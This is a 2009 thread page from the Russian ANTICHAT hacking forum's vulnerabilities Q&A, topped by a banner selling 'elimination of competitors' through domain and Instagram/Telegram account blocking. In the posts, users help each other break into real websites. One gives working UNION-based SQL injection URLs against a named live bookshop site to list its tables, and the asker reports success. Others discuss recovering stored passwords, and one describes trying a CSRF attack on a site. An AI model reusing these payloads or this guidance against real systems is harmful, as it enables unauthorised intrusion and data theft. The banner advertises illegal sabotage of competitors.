УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Ваши вопросы по уязвимостям.

Страница 486 из 1393

486

Опции темы

Поиск в этой теме

Опции просмотра

#4851

21.01.2009, 21:05

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от pinky07

это поле password, а остальные поля login, email выводятся с нормальной кодировкой, кодировку я менял всеровно ничего не получается // это полюбому не в Хексе.
P.s щас попробую сам зарегаться и вывести свой пароль в этих кракозябрах=)))

Кодировка сдесь не причём, гораздо важнее какая база .

В Access такое бывает, какой-то алгоритм хеширования пароля

Если мускул , то или aes_encrypt(скорее всего), или самопис какой-то, по одному значению непонятно. С этим ты ничего не поделаешь, если только ключ угадаешь

#4852

21.01.2009, 21:07

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

Цитата:

Сообщение от TELO

А что это? При запросе version() выдаёт следуюшее
PostgreSQL 7.4.23 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)

database(),user() не проходят
скуль

Код:

http://www.bookzone.com.ua/catalog.php?cid=-11028 UNION SELECT version()

Так в чем проблема-то?

Код:

http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+table_name+from+INFORMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+0--

#4853

22.01.2009, 00:53

TELO

Познающий

Регистрация: 21.01.2009

Сообщений: 98

Провел на форуме:
227123

Репутация: 122

Отправить сообщение для TELO с помощью ICQ

Цитата:

Сообщение от R1dex

Так в чем проблема-то?

Код:

http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+table_name+from+INFORMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+0--

спасибо,нашол таблу. я просто не понял что за версия такая

#4854

22.01.2009, 01:10

TELO

Познающий

Регистрация: 21.01.2009

Сообщений: 98

Провел на форуме:
227123

Репутация: 122

а скажите плиз,как перевести такой пасс ********

#4855

22.01.2009, 01:36

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

TELO в этой таблице нет пассов
http://www.postgresql.org/docs/7.4/static/view-pg-user.html
Ищи другую

#4856

22.01.2009, 01:36

RekRut

Участник форума

Регистрация: 27.02.2006

Сообщений: 261

Провел на форуме:
515774

Репутация: 71

Цитата:

а скажите плиз,как перевести такой пасс ********

мы под твоии звездами нифига не видим, если ты имеешь ввиду как вытащить пароль с под звезд есть спецом проги для етого в гугле пиши типо "стащить пароль из под звездочек"

#4857

22.01.2009, 01:41

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Цитата:

Сообщение от RekRut

Жжешь ))
Сори за оффтоп - не удержался ^^

#4858

22.01.2009, 02:05

Qam

Познающий

Регистрация: 16.01.2009

Сообщений: 40

Провел на форуме:
244040

Репутация: 15

Как по вашему мнению за что может отвечать переменая сид в урл такого вида posting.php?mode=delete&p=40&sid=790c50da612628e41 f4f900a830920c5
Я понимаю может этот вопрос выглядил глупо,просто я пытаюсь осуществить на сайт атаку CSRF!Мне кажется эта переменая мне и мешает пишет мол ошибка сесии!Сильно не ругайте!